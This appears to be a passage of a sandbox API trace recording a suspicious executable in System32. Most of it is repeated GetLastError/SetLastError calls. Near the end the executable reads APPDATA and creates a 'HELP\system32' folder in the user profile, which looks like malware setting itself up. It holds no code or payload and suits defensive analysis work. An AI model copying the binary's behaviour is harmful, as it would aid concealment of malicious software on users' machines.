¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.794] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2ceac8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0033.794] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2cf17c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÉ\x80Èô´ô,", lpUsedDefaultChar=0x0) returned 256 [0033.794] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.794] GetLastError () returned 0x0 [0033.794] SetLastError (dwErrCode=0x0) [0033.794] GetLastError () returned 0x0 [0033.794] SetLastError (dwErrCode=0x0) [0033.794] GetLastError () returned 0x0 [0033.794] SetLastError (dwErrCode=0x0) [0033.794] GetLastError () returned 0x0 [0033.794] SetLastError (dwErrCode=0x0) [0033.794] GetLastError () returned 0x0 [0033.794] SetLastError (dwErrCode=0x0) [0033.794] GetLastError () returned 0x0 [0033.794] SetLastError (dwErrCode=0x0) [0033.794] GetLastError () returned 0x0 [0033.794] SetLastError (dwErrCode=0x0) [0033.794] GetLastError () returned 0x0 [0033.794] SetLastError (dwErrCode=0x0) [0033.794] GetLastError () returned 0x0 [0033.794] SetLastError (dwErrCode=0x0) [0033.794] GetLastError () returned 0x0 [0033.794] SetLastError (dwErrCode=0x0) [0033.794] GetLastError () returned 0x0 [0033.794] SetLastError (dwErrCode=0x0) [0033.794] GetLastError () returned 0x0 [0033.794] SetLastError (dwErrCode=0x0) [0033.794] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.795] SetLastError (dwErrCode=0x0) [0033.795] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.796] SetLastError (dwErrCode=0x0) [0033.796] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.797] SetLastError (dwErrCode=0x0) [0033.797] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.798] SetLastError (dwErrCode=0x0) [0033.798] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.799] SetLastError (dwErrCode=0x0) [0033.799] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.800] GetLastError () returned 0x0 [0033.800] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.801] SetLastError (dwErrCode=0x0) [0033.801] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.802] GetLastError () returned 0x0 [0033.802] SetLastError (dwErrCode=0x0) [0033.803] GetLastError () returned 0x0 [0033.803] SetLastError (dwErrCode=0x0) [0033.803] GetLastError () returned 0x0 [0033.803] SetLastError (dwErrCode=0x0) [0033.803] GetLastError () returned 0x0 [0033.803] SetLastError (dwErrCode=0x0) [0033.803] GetLastError () returned 0x0 [0033.803] SetLastError (dwErrCode=0x0) [0033.803] GetLastError () returned 0x0 [0033.803] SetLastError (dwErrCode=0x0) [0033.803] GetLastError () returned 0x0 [0033.803] SetLastError (dwErrCode=0x0) [0033.803] GetLastError () returned 0x0 [0033.803] SetLastError (dwErrCode=0x0) [0033.803] GetLastError () returned 0x0 [0033.803] SetLastError (dwErrCode=0x0) [0033.803] GetLastError () returned 0x0 [0033.803] SetLastError (dwErrCode=0x0) [0033.803] GetLastError () returned 0x0 [0033.803] SetLastError (dwErrCode=0x0) [0033.803] GetLastError () returned 0x0 [0033.803] SetLastError (dwErrCode=0x0) [0033.803] GetLastError () returned 0x0 [0033.803] SetLastError (dwErrCode=0x0) [0033.803] GetLastError () returned 0x0 [0033.803] SetLastError (dwErrCode=0x0) [0033.803] GetLastError () returned 0x0 [0033.803] SetLastError (dwErrCode=0x0) [0033.804] GetLastError () returned 0x0 [0033.804] SetLastError (dwErrCode=0x0) [0033.804] GetLastError () returned 0x0 [0033.804] SetLastError (dwErrCode=0x0) [0033.804] GetLastError () returned 0x0 [0033.804] SetLastError (dwErrCode=0x0) [0033.804] GetLastError () returned 0x0 [0033.804] SetLastError (dwErrCode=0x0) [0033.804] GetLastError () returned 0x0 [0033.804] SetLastError (dwErrCode=0x0) [0033.804] GetLastError () returned 0x0 [0033.804] SetLastError (dwErrCode=0x0) [0033.804] GetLastError () returned 0x0 [0033.804] SetLastError (dwErrCode=0x0) [0033.804] GetLastError () returned 0x0 [0033.804] SetLastError (dwErrCode=0x0) [0033.804] GetLastError () returned 0x0 [0033.804] SetLastError (dwErrCode=0x0) [0033.844] GetLastError () returned 0x0 [0033.844] SetLastError (dwErrCode=0x0) [0033.844] GetLastError () returned 0x0 [0033.844] SetLastError (dwErrCode=0x0) [0033.844] GetLastError () returned 0x0 [0033.844] SetLastError (dwErrCode=0x0) [0033.844] GetLastError () returned 0x0 [0033.844] SetLastError (dwErrCode=0x0) [0033.844] GetLastError () returned 0x0 [0033.844] SetLastError (dwErrCode=0x0) [0033.844] GetLastError () returned 0x0 [0033.844] SetLastError (dwErrCode=0x0) [0033.844] GetLastError () returned 0x0 [0033.844] SetLastError (dwErrCode=0x0) [0033.844] GetLastError () returned 0x0 [0033.844] SetLastError (dwErrCode=0x0) [0033.844] GetLastError () returned 0x0 [0033.844] SetLastError (dwErrCode=0x0) [0033.844] GetLastError () returned 0x0 [0033.844] SetLastError (dwErrCode=0x0) [0033.844] GetLastError () returned 0x0 [0033.844] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.845] SetLastError (dwErrCode=0x0) [0033.845] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.846] SetLastError (dwErrCode=0x0) [0033.846] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.847] SetLastError (dwErrCode=0x0) [0033.847] GetLastError () returned 0x0 [0033.848] SetLastError (dwErrCode=0x0) [0033.848] GetLastError () returned 0x0 [0033.848] SetLastError (dwErrCode=0x0) [0033.848] GetLastError () returned 0x0 [0033.848] SetLastError (dwErrCode=0x0) [0033.848] GetLastError () returned 0x0 [0033.848] SetLastError (dwErrCode=0x0) [0033.848] GetLastError () returned 0x0 [0033.848] SetLastError (dwErrCode=0x0) [0033.848] GetLastError () returned 0x0 [0033.848] SetLastError (dwErrCode=0x0) [0033.848] GetLastError () returned 0x0 [0033.848] SetLastError (dwErrCode=0x0) [0033.848] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0033.848] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0033.848] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0033.849] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf4f8 | out: lpSystemTimeAsFileTime=0x2cf4f8*(dwLowDateTime=0xe1db8ed0, dwHighDateTime=0x1d3dfba)) [0033.849] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2cf430, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.849] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2cf318, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.849] GetLastError () returned 0x0 [0033.849] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetLastError () returned 0x0 [0033.850] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.850] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0033.850] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.850] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.850] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.850] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.850] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0033.850] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0033.850] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0033.850] CreateDirectoryA 